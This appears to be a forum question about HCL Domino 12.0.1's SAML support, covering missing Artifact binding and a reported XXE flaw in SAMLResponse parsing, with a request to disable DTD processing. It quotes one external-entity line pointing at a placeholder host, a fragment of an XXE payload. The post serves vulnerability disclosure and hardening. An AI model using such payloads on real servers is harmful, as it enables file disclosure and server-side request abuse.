1.) HCL Domino server 12.0.1 (and older) are missing SAML Artifact binding implementation/settings. It has just SAML POST binding :-( Hmm it also works SOAP and inside SAML POST binding, but SAML ARTIFACT binding didn't work for me at all. Is SAML artifact binding supported or I just don't know how to set it up?
I think SAML Artifact binding increase security. Why? Now all trafic goes via browser and Domino has greater possible attack vector. Good thing: I have tried different XML signature wrapping attacks and Domino was not vulnerable :-)
2.) Domino server when doing SAML it is vulnerable to XXE attack via modified "SAMLResponse=" response. "DOCTYPE" in XML is processed by domino server (<!ENTITY % ext SYSTEM "http://anyserver/dtd.txt">)
Is it possible to disable DOCTYPE processing (DTD) inside domino XML processing?
Few links:
SAML 2.0 Artifact Binding: https://everything1know.wordpress.com/2019/02/19/saml-2-0-artifact-binding/
Improving SAML SSO Security Using HTTP Artifact Binding: https://www.identityserver.com/articles/improving-saml-sso-security-using-http-artifact-binding
Fun with SAML SSO Vulnerabilities and Footguns: https://workos.com/blog/fun-with-saml-sso-vulnerabilities-and-footguns
What is the purpose of a SAML Artifact?: https://stackoverflow.com/questions/13616169/what-is-the-purpose-of-a-saml-artifact/17451894#17451894
SAML2 Artifact Binding with signature validation in artifact resolve request: https://is.docs.wso2.com/en/latest/learn/configuring-saml-2.0-artifact-binding/
